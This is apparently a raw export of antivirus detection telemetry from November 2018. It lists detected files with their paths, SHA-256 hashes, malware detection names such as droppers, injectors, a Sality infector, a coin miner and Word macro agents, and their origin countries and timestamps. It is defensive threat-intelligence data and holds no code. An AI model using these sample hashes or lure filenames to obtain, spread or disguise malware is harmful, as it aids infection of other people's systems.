  Row(detection=Row(filename='056cb4da505aa394f91880842a3caceb1501d925d730cb573b524a1fe6ff994c', filepath='C:\\Users\\X\\Downloads\\t\\ D_\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-24\\056CB4DA505AA394F91880842A3CACEB1501D925D730CB573B524A1FE6FF994C', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='056cb4da505aa394f91880842a3caceb1501d925d730cb573b524a1fe6ff994c', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-26.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-24.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-25.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T06:35:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:50:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pdf tender document.tar --> j111.exe', filepath='pdf TENDER DOCUMENT.tar --> J111.exe', filesize=1152000, name='DR/Delphi.6abe65.#M1.#R1'), hash='6abe6528568d3820b27e309c4369b24bf0f1dc41bf8c3774d9c2526104f6a5ff', metadata=Row(cmdline=None, country='DE', os_name='Linux', os_vmajor='3', os_vminor='14', parentproc=None, parentsize=None, timestamp='2018-11-02T16:18:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-125314-ca1a777c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-125314-CA1A777C', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:56:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054552-878fd25f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054552-878FD25F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:45:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='p008', filepath='/var/spool/vscan/amavis/tmp/amavis-20181102T100503-00018/parts/p008', filesize=1152000, name='DR/Delphi.6abe65.#M1.#R1'), hash='6abe6528568d3820b27e309c4369b24bf0f1dc41bf8c3774d9c2526104f6a5ff', metadata=Row(cmdline=None, country='DE', os_name='Linux', os_vmajor='3', os_vminor='14', parentproc=None, parentsize=None, timestamp='2018-11-02T12:30:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='j111.exe', filepath='J111.exe', filesize=1152000, name='DR/Delphi.6abe65.#M1.#R1'), hash='6abe6528568d3820b27e309c4369b24bf0f1dc41bf8c3774d9c2526104f6a5ff', metadata=Row(cmdline=None, country='DE', os_name='Linux', os_vmajor='3', os_vminor='14', parentproc=None, parentsize=None, timestamp='2018-11-02T02:15:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052205-34fac75c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052205-34FAC75C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:22:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='nenosa.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\tmp6823540\\nenosa.exe', filesize=384000, name='HEUR/AGEN.1019710.#M1.#R1'), hash='49824b90c407fe18622be622af760de3518c95d8718e03ea11132b3f914b813d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T23:04:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054610-92436ada', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054610-92436ADA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:46:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='samp-server.exe', filepath='D:\\Games\\samp-server.exe', filesize=1024000, name='W32/Sality.AT.#M1.#R1'), hash='48a4dba98cbe22be684c6cd6f5b8ccc44b53cf9276b939cb947184288be56b41', metadata=Row(cmdline='kimo1234kimo5678 37313435303538353230313437393039323535 58', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='F:\\WolfTeamAS\\Wolfteam.bin', parentsize=7464104, timestamp='2018-11-02T06:51:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='p007', filepath='/var/spool/vscan/amavis/tmp/amavis-20181102T093924-14317/parts/p007', filesize=1152000, name='DR/Delphi.6abe65.#M1.#R1'), hash='6abe6528568d3820b27e309c4369b24bf0f1dc41bf8c3774d9c2526104f6a5ff', metadata=Row(cmdline=None, country='DE', os_name='Linux', os_vmajor='3', os_vminor='14', parentproc=None, parentsize=None, timestamp='2018-11-02T16:18:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-154728-6089a0d2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-154728-6089A0D2', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:50:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-183741-e16d98dd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d921cee2\\AVSCAN-20181102-183725-DECEDB6D\\AVSCAN-20181102-183741-E16D98DD', filesize=24192000, name='TR/Dldr.Megone.24185375.#M1.#R1'), hash='6ffc5fab6a631c07fa4727becfc59073926fd02bf3f94e8e603083b32b19ba13', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T16:37:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-133816-dc7db4ba', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cc556059\\AVSCAN-20181102-133746-D7E1BAE3\\AVSCAN-20181102-133816-DC7DB4BA', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:08:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dealplylivehandler.exe', filepath='C:\\Program Files (x86)\\DealPlyLive\\Update\\1.3.23.0\\DealPlyLiveHandler.exe', filesize=148000, name='ADWARE/DealPly.Gen4.#M300.#R300171'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='AU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T01:48:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='to trinh bau bttndan.exe', filepath='G:\\\xa0\\HOI NGHI 2017\\TO TRINH BAU BTTNDAN.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='671529e197693aa9b48d4480ef080e84f0cc182f3587bffbf91c6388f468d1e0', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=119864, timestamp='2018-11-02T12:15:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055657-13f37e88', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055657-13F37E88', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-113413-1a910c27', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_91bd8850\\AVSCAN-20181102-113236-0BCE7E9D\\AVSCAN-20181102-113413-1A910C27', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:37:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Desktop\\Setup (1)\\msimg32.dll', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T22:48:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-083127-e45e835e', filepath='C:\\Documents and Settings\\X\\Application Data\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-083100-24C03CD9\\AVSCAN-20181102-083127-E45E835E', filesize=1152000, name='DR/Delphi.6abe65.#M1.#R1'), hash='6abe6528568d3820b27e309c4369b24bf0f1dc41bf8c3774d9c2526104f6a5ff', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:31:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054724-be504baf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054724-BE504BAF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='p008', filepath='/var/spool/vscan/amavis/tmp/amavis-20181101T075419-02789/parts/p008', filesize=1152000, name='DR/Delphi.6abe65.#M1.#R1'), hash='6abe6528568d3820b27e309c4369b24bf0f1dc41bf8c3774d9c2526104f6a5ff', metadata=Row(cmdline=None, country='DE', os_name='Linux', os_vmajor='3', os_vminor='14', parentproc=None, parentsize=None, timestamp='2018-11-02T05:00:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061422-828cb9a0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061422-828CB9A0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:14:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055047-375729bb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055047-375729BB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052451-98325961', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052451-98325961', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053212-9f17c9ef', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053212-9F17C9EF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:32:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052420-85960b41', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052420-85960B41', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055316-9078a9e2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055316-9078A9E2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060440-27e0ffac', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060440-27E0FFAC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:04:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060201-c964c765', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060201-C964C765', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:02:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055630-041dea22', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055630-041DEA22', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052830-1a88a3b8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052830-1A88A3B8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061948-4519c6bd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061948-4519C6BD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054926-0749c907', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054926-0749C907', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:49:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052832-1b837b6e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052832-1B837B6E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055035-2fff5a82', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055035-2FFF5A82', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055335-9b58d9eb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055335-9B58D9EB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060857-c156281f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060857-C156281F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062622-2fa901c7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062622-2FA901C7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:26:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062007-50a60809', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062007-50A60809', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053544-1d2ff723', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053544-1D2FF723', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:35:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054006-b9877de5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054006-B9877DE5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:40:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061907-2c9c2e25', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061907-2C9C2E25', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053855-8f2c8dbc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053855-8F2C8DBC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:38:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053936-a79e4d47', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053936-A79E4D47', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:39:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055123-4cf7fde5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055123-4CF7FDE5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060512-3af0ca73', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060512-3AF0CA73', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:05:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T09:06:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T13:00:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053323-c953fa14', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053323-C953FA14', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:33:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062139-86f99ec3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062139-86F99EC3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054307-257110c1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054307-257110C1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:43:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T04:40:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051455-34b7ffc1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051455-34B7FFC1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:14:54Z'), dt=datetime.date(2018, 11, 2)),
